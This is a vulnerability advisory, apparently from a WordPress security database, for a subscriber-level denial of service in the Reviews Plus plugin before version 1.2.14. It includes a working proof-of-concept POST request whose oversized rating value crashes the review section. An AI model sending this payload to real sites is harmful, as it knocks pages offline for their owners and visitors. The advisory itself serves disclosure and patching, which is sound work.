WordPress Plugin Vulnerabilities
Reviews Plus < 1.2.14 - Subscriber+ Reviews DoS
Description
The plugin does not validate the submitted rating, allowing submission of long integer, causing a Denial of Service in the review section when an authenticated user submit such rating and the reviews are set to be displayed on the post/page
Proof of Concept
Enable reviews for post/pages, and enable the "Show Reviews on" setting for All posts or pages as well. Then log in as a user such as subscriber and submit a review with a long rating, e.g POST /wp-comments-post.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 181 Connection: close Cookie: [subscriber+] Upgrade-Insecure-Requests: 1 comment_type=ic_rev_post&review_type=ic_rev_post&ic_review_rating=100000000000000000000000&ic_review_title=aa&comment=cerh&submit=Submit+Review&comment_post_ID=2123&comment_parent=0 The review section of the post/page will crash with an error like "Allowed memory size of 268435456 bytes exhausted (tried to allocate 249561152 bytes) in /var/www/wp-content/plugins/reviews-plus/functions/functions.php on line 76" when viewed
Affects Plugins
Fixed in version 1.2.14
References
Classification
Type
DOS
CWE
Miscellaneous
Original Researcher
Drew Jones
Submitter
Drew Jones
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-10-25 (about 7 months ago)
Added
2021-10-25 (about 7 months ago)
Last Updated
2022-04-10 (about 1 months ago)